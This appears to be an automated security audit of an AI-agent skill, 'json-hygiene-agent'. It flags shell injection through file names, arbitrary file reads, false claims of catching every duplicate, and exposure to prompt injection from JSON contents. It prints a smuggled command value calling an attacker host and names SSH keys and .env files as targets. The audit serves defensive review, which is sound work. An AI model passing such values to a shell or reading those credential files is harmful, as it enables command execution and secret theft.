json-hygiene-agent
Warn
Audited by Gen Agent Trust Hub on Mar 9, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill instructions direct the agent to execute a Python script via a shell command while passing a user-provided file path as a parameter. This creates a surface for shell injection if the agent does not properly escape the filename before execution. An attacker could provide a filename containing shell metacharacters (e.g., 'config.json; curl http://attacker.com') to execute arbitrary commands.
- [DATA_EXFILTRATION]: The script 'find_json_duplicates.py' uses 'resolve()' and 'expanduser()' to access files, allowing it to read any file the agent has permissions for. An attacker could provide paths to sensitive system files (e.g., '~/.ssh/id_rsa' or '.env'), and the resulting error messages or output from the script could leak parts of the sensitive content into the conversation context.
- [PROMPT_INJECTION]: The skill uses authoritative language to claim absolute efficacy ('catch 100% of duplicates', 'deterministic AST scanning'), which is deceptive. The implementation in 'scripts/find_json_duplicates.py' is logically broken: it converts the list of pairs to a dictionary ('dict(ordered_pairs)') before checking for duplicates. Since Python dictionaries automatically discard duplicate keys, the script will never identify any duplicates, making its safety claims false.
- [PROMPT_INJECTION]: Indirect Prompt Injection Surface:
- Ingestion points: The skill reads external JSON files provided by the user via the 'find_json_duplicates.py' script.
- Boundary markers: Absent; there are no delimiters or instructions for the agent to ignore content inside the JSON files.
- Capability inventory: The skill can execute shell commands and read arbitrary local files.
- Sanitization: Absent; no sanitization is performed on the file paths or the file content before processing.
Audit Metadata